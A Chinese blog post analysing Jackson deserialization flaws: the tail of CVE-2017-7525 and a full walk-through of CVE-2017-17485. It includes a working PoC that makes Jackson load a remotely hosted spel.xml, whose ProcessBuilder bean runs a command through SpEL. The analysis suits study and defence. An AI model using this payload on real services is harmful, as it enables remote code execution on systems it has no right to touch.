<p>第一步的<code>deserializeAndSet</code>是object设置成Templates对象，之后的<code>deserializeAndSet</code>就是给Templates对象设置一下属性的事，这里专门挑了属性为<code>outputProperties</code>的时候跟进看了一看<br>，不难看出相较于存在set方法的属性，这里的<code>deserializeAndSet</code>是由<code>SetterlessProperty</code>实现而非<code>MethodProperty</code>实现的。<br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240220021023.png"><br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240220020830.png"></p>
<p>之后就没什么特别的东西了，和Fastjson那里调用Templatels是一样的，都是通过任意getter调用<code>getOutputProperties</code> 实现<code>Templates</code>链利用。</p>
<h4 id="细节补充"><a href="#细节补充" class="headerlink" title="细节补充"></a>细节补充</h4><p>主要就是写一下为什么这条Templates会对jdk版本有限制，毕竟从头到尾看下来好像没发现jdk7相较于jdk8什么特殊的点，这里直接点名原因<br>jdk7<br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240220021735.png"><br>jdk8<br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240220021857.png"></p>
<p>在新建 TransletClassLoader 类实例的代码，jdk8调用了其中的 <code>_tfactory</code> 属性，而因为 <code>_tfactory</code> 在原本的 <code>TemplatesImpl</code> 类中都没有 getter 或 setter 方法，Jackson 也无法设置 <code>_tfactory</code>，所以在poc中其值默认为 null，于是就会jdk8就抛出异常了。</p>
<p>而CVE-2017-7525是怎么修复的也是比较简单粗暴，就是后续版本的jackson在创建Bean 反序列化器的时候加了个黑名单把<code>Templates</code>给过滤掉了。</p>
<h3 id="CVE-2017-17485"><a href="#CVE-2017-17485" class="headerlink" title="CVE-2017-17485"></a>CVE-2017-17485</h3><h4 id="环境准备-1"><a href="#环境准备-1" class="headerlink" title="环境准备"></a>环境准备</h4><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">dependencies</span>&gt;</span>  </span><br><span class="line">  <span class="tag">&lt;<span class="name">dependency</span>&gt;</span>  </span><br><span class="line">    <span class="tag">&lt;<span class="name">groupId</span>&gt;</span>com.fasterxml.jackson.core<span class="tag">&lt;/<span class="name">groupId</span>&gt;</span>  </span><br><span class="line">    <span class="tag">&lt;<span class="name">artifactId</span>&gt;</span>jackson-databind<span class="tag">&lt;/<span class="name">artifactId</span>&gt;</span>  </span><br><span class="line">    <span class="tag">&lt;<span class="name">version</span>&gt;</span>2.7.9.1<span class="tag">&lt;/<span class="name">version</span>&gt;</span>  </span><br><span class="line">  <span class="tag">&lt;/<span class="name">dependency</span>&gt;</span>  </span><br><span class="line">  <span class="tag">&lt;<span class="name">dependency</span>&gt;</span>  </span><br><span class="line">    <span class="tag">&lt;<span class="name">groupId</span>&gt;</span>com.fasterxml.jackson.core<span class="tag">&lt;/<span class="name">groupId</span>&gt;</span>  </span><br><span class="line">    <span class="tag">&lt;<span class="name">artifactId</span>&gt;</span>jackson-core<span class="tag">&lt;/<span class="name">artifactId</span>&gt;</span>  </span><br><span class="line">    <span class="tag">&lt;<span class="name">version</span>&gt;</span>2.7.9<span class="tag">&lt;/<span class="name">version</span>&gt;</span>  </span><br><span class="line">  <span class="tag">&lt;/<span class="name">dependency</span>&gt;</span>  </span><br><span class="line">  <span class="tag">&lt;<span class="name">dependency</span>&gt;</span>  </span><br><span class="line">    <span class="tag">&lt;<span class="name">groupId</span>&gt;</span>com.fasterxml.jackson.core<span class="tag">&lt;/<span class="name">groupId</span>&gt;</span>  </span><br><span class="line">    <span class="tag">&lt;<span class="name">artifactId</span>&gt;</span>jackson-annotations<span class="tag">&lt;/<span class="name">artifactId</span>&gt;</span>  </span><br><span class="line">    <span class="tag">&lt;<span class="name">version</span>&gt;</span>2.7.9<span class="tag">&lt;/<span class="name">version</span>&gt;</span>  </span><br><span class="line">  <span class="tag">&lt;/<span class="name">dependency</span>&gt;</span>  </span><br><span class="line">  <span class="tag">&lt;<span class="name">dependency</span>&gt;</span>  </span><br><span class="line">    <span class="tag">&lt;<span class="name">groupId</span>&gt;</span>org.springframework<span class="tag">&lt;/<span class="name">groupId</span>&gt;</span>  </span><br><span class="line">    <span class="tag">&lt;<span class="name">artifactId</span>&gt;</span>spring-context<span class="tag">&lt;/<span class="name">artifactId</span>&gt;</span>  </span><br><span class="line">    <span class="tag">&lt;<span class="name">version</span>&gt;</span>5.0.2.RELEASE<span class="tag">&lt;/<span class="name">version</span>&gt;</span>  </span><br><span class="line">  <span class="tag">&lt;/<span class="name">dependency</span>&gt;</span>  </span><br><span class="line">  <span class="tag">&lt;<span class="name">dependency</span>&gt;</span>  </span><br><span class="line">    <span class="tag">&lt;<span class="name">groupId</span>&gt;</span>org.springframework<span class="tag">&lt;/<span class="name">groupId</span>&gt;</span>  </span><br><span class="line">    <span class="tag">&lt;<span class="name">artifactId</span>&gt;</span>spring-beans<span class="tag">&lt;/<span class="name">artifactId</span>&gt;</span>  </span><br><span class="line">    <span class="tag">&lt;<span class="name">version</span>&gt;</span>5.0.2.RELEASE<span class="tag">&lt;/<span class="name">version</span>&gt;</span>  </span><br><span class="line">  <span class="tag">&lt;/<span class="name">dependency</span>&gt;</span>  </span><br><span class="line">  <span class="tag">&lt;<span class="name">dependency</span>&gt;</span>  </span><br><span class="line">    <span class="tag">&lt;<span class="name">groupId</span>&gt;</span>org.springframework<span class="tag">&lt;/<span class="name">groupId</span>&gt;</span>  </span><br><span class="line">    <span class="tag">&lt;<span class="name">artifactId</span>&gt;</span>spring-core<span class="tag">&lt;/<span class="name">artifactId</span>&gt;</span>  </span><br><span class="line">    <span class="tag">&lt;<span class="name">version</span>&gt;</span>5.0.2.RELEASE<span class="tag">&lt;/<span class="name">version</span>&gt;</span>  </span><br><span class="line">  <span class="tag">&lt;/<span class="name">dependency</span>&gt;</span>  </span><br><span class="line">  <span class="tag">&lt;<span class="name">dependency</span>&gt;</span>  </span><br><span class="line">    <span class="tag">&lt;<span class="name">groupId</span>&gt;</span>org.springframework<span class="tag">&lt;/<span class="name">groupId</span>&gt;</span>  </span><br><span class="line">    <span class="tag">&lt;<span class="name">artifactId</span>&gt;</span>spring-expression<span class="tag">&lt;/<span class="name">artifactId</span>&gt;</span>  </span><br><span class="line">    <span class="tag">&lt;<span class="name">version</span>&gt;</span>5.0.2.RELEASE<span class="tag">&lt;/<span class="name">version</span>&gt;</span>  </span><br><span class="line">  <span class="tag">&lt;/<span class="name">dependency</span>&gt;</span>  </span><br><span class="line">  <span class="tag">&lt;<span class="name">dependency</span>&gt;</span>  </span><br><span class="line">    <span class="tag">&lt;<span class="name">groupId</span>&gt;</span>commons-logging<span class="tag">&lt;/<span class="name">groupId</span>&gt;</span>  </span><br><span class="line">    <span class="tag">&lt;<span class="name">artifactId</span>&gt;</span>commons-logging<span class="tag">&lt;/<span class="name">artifactId</span>&gt;</span>  </span><br><span class="line">    <span class="tag">&lt;<span class="name">version</span>&gt;</span>1.2<span class="tag">&lt;/<span class="name">version</span>&gt;</span>  </span><br><span class="line">  <span class="tag">&lt;/<span class="name">dependency</span>&gt;</span>  </span><br><span class="line"><span class="tag">&lt;/<span class="name">dependencies</span>&gt;</span></span><br></pre></td></tr></table></figure>

<h4 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="漏洞复现"></a>漏洞复现</h4><p>PoC.java</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">PoC</span> &#123;    </span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span>  &#123;    </span><br><span class="line">        <span class="comment">//CVE-2017-17485    </span></span><br><span class="line">        <span class="type">String</span> <span class="variable">payload</span> <span class="operator">=</span> <span class="string">&quot;[\&quot;org.springframework.context.support.ClassPathXmlApplicationContext\&quot;, \&quot;http://127.0.0.1:8888/spel.xml\&quot;]&quot;</span>;    </span><br><span class="line">        <span class="type">ObjectMapper</span> <span class="variable">mapper</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ObjectMapper</span>();    </span><br><span class="line">        mapper.enableDefaultTyping();    </span><br><span class="line">        <span class="keyword">try</span> &#123;    </span><br><span class="line">            mapper.readValue(payload, Object.class);    </span><br><span class="line">        &#125; <span class="keyword">catch</span> (IOException e) &#123;    </span><br><span class="line">            e.printStackTrace();    </span><br><span class="line">        &#125;    </span><br><span class="line">    &#125;    </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>sepl.xml</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">beans</span> <span class="attr">xmlns</span>=<span class="string">&quot;http://www.springframework.org/schema/beans&quot;</span>  </span></span><br><span class="line"><span class="tag">       <span class="attr">xmlns:xsi</span>=<span class="string">&quot;http://www.w3.org/2001/XMLSchema-instance&quot;</span>  </span></span><br><span class="line"><span class="tag">       <span class="attr">xsi:schemaLocation</span>=<span class="string">&quot;  </span></span></span><br><span class="line"><span class="string"><span class="tag">     http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd&quot;</span>&gt;</span>  </span><br><span class="line">    <span class="tag">&lt;<span class="name">bean</span> <span class="attr">id</span>=<span class="string">&quot;pb&quot;</span> <span class="attr">class</span>=<span class="string">&quot;java.lang.ProcessBuilder&quot;</span>&gt;</span>  </span><br><span class="line">        <span class="tag">&lt;<span class="name">constructor-arg</span> <span class="attr">value</span>=<span class="string">&quot;calc&quot;</span> /&gt;</span>  </span><br><span class="line">        <span class="tag">&lt;<span class="name">property</span> <span class="attr">name</span>=<span class="string">&quot;whatever&quot;</span> <span class="attr">value</span>=<span class="string">&quot;#&#123; pb.start() &#125;&quot;</span>/&gt;</span>  </span><br><span class="line">    <span class="tag">&lt;/<span class="name">bean</span>&gt;</span>  </span><br><span class="line"><span class="tag">&lt;/<span class="name">beans</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>结果如下图所示,spel.xml是挂到了python起的服务器上</p>
<p><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240220134109.png"></p>
<h4 id="漏洞分析"><a href="#漏洞分析" class="headerlink" title="漏洞分析"></a>漏洞分析</h4><p>就像之前提到的那样，在反序列化的过程中会调用默认的构造函数，我们前面的步骤直接省略跳过，从构造函数这里开始分析，跟一步重载，来到关键的<code>refreshe()</code>这里，跟进去分析。<br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240220154642.png"><br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240220154829.png"></p>
<p><code>refreshe()</code>这个方法是 Spring Bean 加载的核心，它是 <code>ClassPathXmlApplicationContext </code>的父类 <code>AbstractApplicationContext</code> 的一个方法 ， 用于刷新整个Spring 上下文信息，定义了整个 Spring 上下文加载的流程。着重关注<code>obtainFreshBeanFactory</code>这块，这里的<code>beanFactory</code>和xml解析加载成对象显然是息息相关的。此方法会解析配置文件并将bean信息存储到beanDefinition中，注册到BeanFactory（但是未被初始化，仅将信息写到了beanDefination的map中）下面的操作都基于这个beanFactory进行，我们跟进去看看它是怎么解析xml的。</p>
<p><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240220155043.png"></p>
<p>跟进<code>this.refreshBeanFactory();</code></p>
<p><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240220155456.png"></p>
<p>先检查当前的上下文环境是否已经由了<code>BeanFactory</code>，如果的确存在就先把其中管理的bean全都销毁再关闭当前<code>beanFactory</code>，之后再建立一个新的<code>BeanFactory</code>重新配置，这里着重看看50行，光从名字就知道这里肯定和<code>bean</code>加载有关系，浅跟一下。</p>
<p><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240220155727.png"></p>
<p>在32-35行建立设置了一个xml加载器，并且把<code>beanFactory</code>绑定在上面，最后利用37行的重载调用这个xml加载器进行加载，我们跟进看看</p>
<p><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240220160254.png"></p>
<p>如果当前存在设置好的Resource对象，就有限把Resource传给<code>xmlreader</code>利用Resource的自有属性进行bean加载，如果并不存在相应的Resource对象，则尝试读取<code>configLocation</code>，到指定位置进行bean加载。</p>
<p><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240220161418.png"></p>
<p>遍历locations数组得到当前location进行加载，这里仔细跟的话又是好几步重载，简单来看的话就是把location封装成了resoure对象，然后调用Resource的那个loadBeanDefinitions来加载，和上面属于是殊途同归了。在最后一步重载上不用分析的代码有点多，影响截图了，这里直接贴精选版的代码来分析，此处批注是别的师傅写的，写的挺清晰，这里就先拿过来用了</p>
<p><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240220162127.png"></p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="type">int</span> <span class="title function_">loadBeanDefinitions</span><span class="params">(EncodedResource encodedResource)</span> <span class="keyword">throws</span> BeanDefinitionStoreException &#123;  </span><br><span class="line">	<span class="keyword">try</span> &#123;  </span><br><span class="line">		<span class="comment">//获取Resource对象中的xml文件流对象,在这一段上实现了远程访问  </span></span><br><span class="line">		<span class="type">InputStream</span> <span class="variable">inputStream</span> <span class="operator">=</span> encodedResource.getResource().getInputStream();  </span><br><span class="line">		<span class="keyword">try</span> &#123;  </span><br><span class="line">			<span class="comment">//InputSource是jdk中的sax xml文件解析对象  </span></span><br><span class="line">			<span class="type">InputSource</span> <span class="variable">inputSource</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">InputSource</span>(inputStream);  </span><br><span class="line">			<span class="keyword">if</span> (encodedResource.getEncoding() != <span class="literal">null</span>) &#123;  </span><br><span class="line">				inputSource.setEncoding(encodedResource.getEncoding());  </span><br><span class="line">			&#125;  </span><br><span class="line">			<span class="comment">//主要看这个方法  </span></span><br><span class="line">			<span class="keyword">return</span> doLoadBeanDefinitions(inputSource, encodedResource.getResource());  </span><br><span class="line">		&#125;  </span><br><span class="line">		<span class="keyword">finally</span> &#123;  </span><br><span class="line">			inputStream.close();  </span><br><span class="line">		&#125;  </span><br><span class="line">	&#125;  </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>跟进一下<code>doLoadBeanDefinitions</code>，这里如果是用idea反编译做调试的话就会没法跟进方法，需要自己搭建一个带jackson的spring环境。390行这块把inputSource 封装成Document文件对象，在之后的391行再根据解析出来的document对象，拿到里面的标签元素，将其封装成BeanDefinition，跟进一下391行</p>
<p><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240221151829.png"></p>
<p>这段代码是用来从一个XML文档中读取和注册Bean定义的。它的参数是一个Document对象，表示XML文档，和一个Resource对象，表示文档的来源。它的返回值是注册的Bean定义的数量。它的具体步骤如下：</p>
<ul>
<li>创建一个BeanDefinitionDocumentReader对象，用来解析XML文档中的Bean定义。默认的实现类是DefaultBeanDefinitionDocumentReader。</li>
<li>获取Bean定义的注册中心，也就是BeanFactory的实现类，比如DefaultListableBeanFactory。记录下注册前的Bean定义的数量。</li>
<li>调用documentReader的registerBeanDefinitions方法，传入Document对象和一个XmlReaderContext对象。这个方法会遍历XML文档的根元素和子元素，根据不同的命名空间和标签，使用NamespaceHandler 和BeanDefinitionParser来解析Bean定义，并将其注册到注册中心中。</li>
<li>返回注册后的Bean定义的数量减去注册前的数量，得到本次注册的Bean定义的数量。</li>
</ul>
<p>比较重要的部分在第507行，就是在这里解析的bean。我们先跟进去看看<code>createReaderContext</code><br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240221152640.png"></p>
<p>直接贴代码，不截图了，这里是创建了一个XmlReaderContext对象，关注一下它的几个参数然后出栈跟进<code>registerBeanDefinitions</code>即可</p>
<ul>
<li><strong>resource</strong>: 一个Resource对象，表示XML文档的来源，比如一个文件或者一个URL。</li>
<li><strong>this.problemReporter</strong>: 一个ProblemReporter对象，用来报告XML解析过程中遇到的错误或者警告。</li>
<li><strong>this.eventListener</strong>: 一个EventListener对象，用来监听XML解析过程中发生的事件，比如Bean定义的注册或者别名的定义。</li>
<li><strong>this.sourceExtractor</strong>: 一个SourceExtractor对象，用来从XML节点中提取源信息，比如行号或者列号。</li>
<li><strong>this</strong>: 一个XmlBeanDefinitionReader对象，表示当前的XML解析器。</li>
<li><strong>getNamespaceHandlerResolver()</strong>: 一个NamespaceHandlerResolver对象，用来根据命名空间URI找到对应的NamespaceHandler，用来处理自定义的XML标签78。</li>
</ul>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> XmlReaderContext <span class="title function_">createReaderContext</span><span class="params">(Resource resource)</span> &#123;  </span><br><span class="line">   <span class="keyword">return</span> <span class="keyword">new</span> <span class="title class_">XmlReaderContext</span>(resource, <span class="built_in">this</span>.problemReporter, <span class="built_in">this</span>.eventListener,  </span><br><span class="line">         <span class="built_in">this</span>.sourceExtractor, <span class="built_in">this</span>, getNamespaceHandlerResolver());  </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>


<p><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240221153942.png"></p>
<p>先取出当前正在使用的代理，再调用 <code>createDelegate</code> 方法，根据 <code>root</code> 元素和 <code>parent</code> 代理，创建一个新的解析代理，并赋值给 <code>this.delegate</code>，使得可以在不同的层级使用不同的代理。这里的代理是指 <code>BeanDefinitionParserDelegate</code> 类，它是一个辅助类，用来解析 XML 文件中的 bean 定义。因为里面的bean不止一个，所以需要多个代理。中间那一长串<code>if</code>暂时跳过，重点关注<strong>preProcessXml</strong>、<strong>parseBeanDefinitions</strong>、<strong>postProcessXml</strong>三个方法。其中 preProcessXml 和 postProcessXml 都是空方法，意思是在解析标签前后我们自己可以扩展需要执行的操作，也是一个模板方法模式，体现了 Spring 的高扩展性。然后进入 parseBeanDefinitions 方法看具体是怎么解析标签的。<br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240221165642.png"></p>
<p>从根节点开始遍历解析，判断当前节点是用自定义标签还是默认标签的形式解析，此处遍历到的<code>&lt;bean id=&quot;pb&quot; class=&quot;java.lang.ProcessBuilder&quot;&gt;  </code>用的是默认标签形式，跟进175行。</p>
<p>ps: 带前缀的就是自定义标签，否则就是 Spring 默认标签</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">xmlns:context=&quot;http://www.springframework.org/schema/context&quot;</span><br><span class="line">http://www.springframework.org/schema/beans</span><br></pre></td></tr></table></figure>

<p><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240221170700.png"></p>
<p>因为解析的标签是bean标签，这里走195行的逻辑，最终会将这些标签属性的值装入到 BeanDefinition 对象中，这里就不用跟进了，我们出栈，回到最初的起点<code>AbstractApplicationContext#refresh</code>继续分析</p>
<p><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240221171228.png"></p>
<p>来到line#531这里，顺带一提我们现在已经能够看到beanFactory里面出现我们刚才搞出来的BeanDefinition了，跟进。</p>
<p><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240221172110.png"></p>
<p>跟进line#693</p>
<p><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240221172953.png"></p>
<p>前面有些地方用不到，只把关键的部分贴出来，跟进这里的<code>beanFactory.getBeanNamesForType</code></p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">invokeBeanFactoryPostProcessors</span><span class="params">(  </span></span><br><span class="line"><span class="params">      ConfigurableListableBeanFactory beanFactory, List&lt;BeanFactoryPostProcessor&gt; beanFactoryPostProcessors)</span> &#123;</span><br><span class="line">      List&lt;BeanDefinitionRegistryPostProcessor&gt; currentRegistryProcessors = <span class="keyword">new</span> <span class="title class_">ArrayList</span>&lt;&gt;();  </span><br><span class="line">	<span class="comment">// First, invoke the BeanDefinitionRegistryPostProcessors that implement PriorityOrdered.  </span></span><br><span class="line">String[] postProcessorNames =  </span><br><span class="line">      beanFactory.getBeanNamesForType(BeanDefinitionRegistryPostProcessor.class, <span class="literal">true</span>, <span class="literal">false</span>);</span><br><span class="line">      &#125;</span><br></pre></td></tr></table></figure>
<p>跟进<code>doGetBeanNamesForType</code><br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240221174515.png"><br>此处调用 <code>isFactoryBean()</code> 判断当前 beanName 是否为 FactoryBean，此时 beanName 参数值为 <strong>pb</strong>，mbd 参数中识别到 bean 标签中的类为 <code>java.lang.ProcessBuilder</code>，跟进看看<br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240221184249.png"><br>调用<code>predictBeanType</code>来拿到bean的<code>class</code>，跟进<br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240221184452.png"></p>
<p>这里多截几张图跟一下，大概就是一个关于targetType求而不得,层层相求的故事,直到<code>deResolveBeanClass</code>开始对类名进行 SpEL 表达式解析求值才得以解决问题，此时className参数指向”java.lang.ProcessBuilder，我们从<code>1409</code>开始跟进</p>
<p><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240221192903.png"><br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240221192925.png"><br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240221193036.png"><br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240221193336.png"></p>
<p>关注一下这里的 <code>this.beanExpressionResolver.evaluate()</code>，此时<code>this.beanExpressionResolver</code>指向的是<code>StandardBeanExpressionResolver</code>，已经找用到了对应的SpEL表达式解析器</p>
<p><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240221193548.png"><br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240221194323.png"></p>
<p>跟进StandardBeanExpressionResolver.evaluate()函数，发现调用了Expression.getValue()方法即SpEL表达式执行的方法，其中sec参数是我们可以控制的内容即由spel.xml解析得到的SpEL表达式，之后就是SPEL注入的流程了。</p>
<p><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240221194648.png"></p>
<p>到此整个漏洞就算分析完毕了，一整个就是<code>ClassPathXmlApplicationContext</code>的构造函数引发的惨案</p>

        
      </div>

         
    </div>
    
     
  </div>
  
    
<nav id="article-nav">
  <a class="article-nav-btn left "
    
      href="/2024/02/26/Weblogic%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90(%E4%B8%80)/"
      title="Weblogic漏洞分析(一)"
     >
    <i class="fa-solid fa-angle-left"></i>
    <p class="title-text">
      
        Weblogic漏洞分析(一)
        
    </p>
  </a>
  <a class="article-nav-btn right "
    
      href="/2024/01/01/2023%E5%B9%B4%E5%BA%A6%E6%80%BB%E7%BB%93/"
      title="关于2023的年度总结"
     >

    <p class="title-text">
      
        关于2023的年度总结
        
    </p>
    <i class="fa-solid fa-angle-right"></i>
  </a>
</nav>


  
</article>

 
    </div>
    <div id="footer-wrapper">
      <footer id="footer">
  
  <div id="footer-info" class="inner">
    
    &copy; 2026 F4miti0n<br>
    Powered by <a href="https://hexo.io/" target="_blank">Hexo</a> & Theme <a target="_blank" rel="noopener" href="https://github.com/saicaca/hexo-theme-vivia">Vivia</a>
  </div>
</footer>

    </div>
    <div class="back-to-top-wrapper">
    <button id="back-to-top-btn" class="back-to-top-btn" onclick="topFunction()">
        <span class="material-symbols-rounded">keyboard_arrow_up</span>
    </button>
</div>

<script>
    function topFunction() {
        window.scroll({ top: 0, behavior: 'smooth' });
    }
    let btn = document.getElementById('back-to-top-btn');
    function scrollFunction() {
        if (document.body.scrollTop > 600 || document.documentElement.scrollTop > 600) {
            btn.style.opacity = 1;
        } else {
            btn.style.opacity = 0;
        }
    }
    window.onscroll = function() {
        scrollFunction();
    }
</script>

  </div>
  <script src="/js/light-dark-switch.js"></script>
</body>
</html>
